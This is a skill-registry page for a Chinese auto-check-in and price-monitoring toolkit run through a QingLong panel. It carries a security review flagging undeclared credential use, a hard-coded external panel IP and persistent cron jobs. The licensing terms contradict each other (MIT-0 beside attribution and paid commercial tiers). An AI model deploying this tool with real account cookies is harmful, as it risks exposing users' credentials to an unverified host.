ClawHub
Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Wool Gathering

薅羊毛综合技能 - 自动签到、价格监控、优惠券推送。支持阿里云盘、百度网盘、B站、爱奇艺、京东等平台。包括青龙面板部署、dailycheckin配置、价格爬虫开发。

MIT-0 · Free to use, modify, and redistribute. No attribution required.
0 · 12 · 0 current installs · 0 all-time installs
by@zhaog100
MIT-0
Security Scan
VirusTotalVirusTotal
Benign
View report →
OpenClawOpenClaw
Suspicious
high confidence
!
Purpose & Capability
The files (price crawlers, push notification, checkin helpers) align with the stated purpose of auto sign-in and price monitoring. However the package metadata claims no required env vars or credentials while the code and config templates expect many sensitive values (push tokens, email password, DB path, cookies). Also the SKILL.md repeatedly references deploying to a QingLong panel (including a hard-coded IP: 43.133.55.138:5700) — that address is unrelated to an individual user's environment and is unexpected in a generic skill.
Instruction Scope
Runtime instructions instruct the user to interact with a QingLong container (docker exec, edit crontab in /ql) and to add scheduled tasks. That is coherent with deploying scheduled sign-in tasks, but the docs include a specific external panel URL/IP and recommend editing container crontab files — operations that modify a third-party management system and create persistent scheduled jobs. The SKILL.md also points to cookie acquisition guides and asks you to provide cookies/tokens (sensitive). Instructions are not asking to read arbitrary host files beyond the skill/config, but they grant the skill broad discretion to run scheduled jobs on your QingLong instance.
Install Mechanism
There is no install spec (instruction-only in registry), and code files are included rather than being downloaded at runtime. That lowers supply-chain install risk. No remote archives or installers are fetched by the skill itself. However quick_start.sh and docker guidance will cause users to run code/containers on their systems — review those scripts before execution.
!
Credentials
Registry metadata declares no required environment variables, but config_loader and assets/config_template.json expect multiple sensitive environment variables and tokens (WOOL_SERVERCHAN_KEY, WOOL_PUSHPLUS_TOKEN, WOOL_EMAIL_PASSWORD, WOOL_DINGTALK_SECRET, etc.). The skill will accept and use secrets (cookies, push keys, SMTP password). This mismatch between declared and actual requirements is a red flag: the skill asks for secrets but didn't declare them up front in metadata.
Persistence & Privilege
The skill does not set always:true and does not request platform-level privileges. Nevertheless SKILL.md and scripts instruct adding cron entries into a QingLong container to run scheduled tasks (persistent jobs). That behavior is expected for a scheduler-based auto-checkin tool, but it creates a persistent attack surface on whatever system you deploy to (QingLong). The hard-coded panel IP in docs suggests an external management/monitoring reference that you should verify.
What to consider before installing
What to check before installing or running this skill: 1) Secrets & metadata mismatch: although the registry lists no required env vars, the code and config templates expect many sensitive values (push tokens, DingTalk secret, email password, cookies). Don't supply real primary-account cookies or passwords until you audit code. Prefer test/sandbox accounts. 2) Hard-coded external panel IP: SKILL.md documents a QingLong panel at 43.133.55.138:5700. Verify you control the panel you deploy to; do not point your deployment to an unknown remote host. Remove or replace any hard-coded addresses with your own. 3) Review scripts before running: inspect quick_start.sh, any cron-add instructions, and the code that writes to /ql/data/config/crontab.list. These will create persistent scheduled tasks on your QingLong/container host. 4) Secrets storage: config_template.json shows storing SMTP password and tokens in plain files. If you proceed, keep secrets in environment variables or a secrets manager and avoid committing config.json to shared storage. 5) Network & legal: the skill performs web scraping against third-party sites (jd, taobao). Rate-limit and use small test runs to avoid violating terms of service or triggering IP blocks. Follow the SKILL.md 'don’t abuse' guidance. 6) Source verification: the SKILL.md and package.json point to a GitHub repo. Confirm the repository and author are legitimate and review upstream commits for unexpected telemetry/exfiltration code. 7) Operational advice: run first in an isolated environment (VM/container) with network restrictions and test accounts; monitor outbound connections; do not expose your main accounts or credentials to this code until you’ve reviewed and hardened configuration. If you want, I can: (a) list the exact environment variables and config keys the code reads, (b) highlight every place in the code that sends data to external endpoints, or (c) generate a minimal-safe config.json example for sandbox testing.

Like a lobster shell, security has layers — review code before you run it.

Current versionv1.2.3
Download zip
latestvk979np1c2de1zc57xw0rgkwcgd839hem

License

MIT-0
Free to use, modify, and redistribute. No attribution required.
Termshttps://spdx.org/licenses/MIT-0.html

SKILL.md

薅羊毛综合技能 v2.3

自动化省钱赚钱工具集。

🎯 核心功能

京东系统(✅ 已上线)

  • 22个定时任务,双账号支持
  • 核心收益:领京豆、农场浇水、嘉年华城、PLUS盲盒/专属礼等
  • 预期月收益:110-258元(双账号)

自动签到(已部署)

  • 平台:阿里云盘、百度网盘、B站、爱奇艺等12个
  • 预期收益:每月省100-200元会员费

价格监控(待开发)

优惠券推送(待开发)

🚀 使用方式

# 青龙面板管理
docker ps | grep qinglong
docker exec qinglong dailycheckin          # 手动签到
docker logs qinglong --tail 100            # 查看日志

# 面板地址:http://43.133.55.138:5700
# 签到定时:0 8 * * * dailycheckin

📁 结构

wool-gathering/
├── scripts/          # 可执行脚本(price_monitor, push_notification, coupon_fetcher)
├── references/       # 参考文档(qinglong-setup, platform-apis)
├── assets/           # 配置文件(config_template.json, docker-compose.yml)
├── JD_PLUS_GUIDE.md
└── JD_EARNINGS_REPORT.md

⚠️ 注意

  • ✅ 自动签到、价格监控、联盟API优惠券合规
  • ❌ 恶意抢券、爬虫滥用、刷单刷评违规
  • Cookie定期更新,使用小号测试

详细平台列表、Cookie获取教程、价格监控开发指南见 references/skill-details.md

📄 许可证与版权声明

MIT License

Copyright (c) 2026 思捷娅科技 (SJYKJ)

免费使用、修改和重新分发时,需注明出处。

出处

商业使用授权

  • 个人/开源:免费
  • 小微企业(<10 人):¥999/年
  • 中型企业(10-50 人):¥4,999/年
  • 大型企业(>50 人):¥19,999/年
  • 源码买断:¥99,999 一次性

详情请查看:LICENSE

Files

19 total
Select a file
Select a file to preview.

Comments

Loading comments…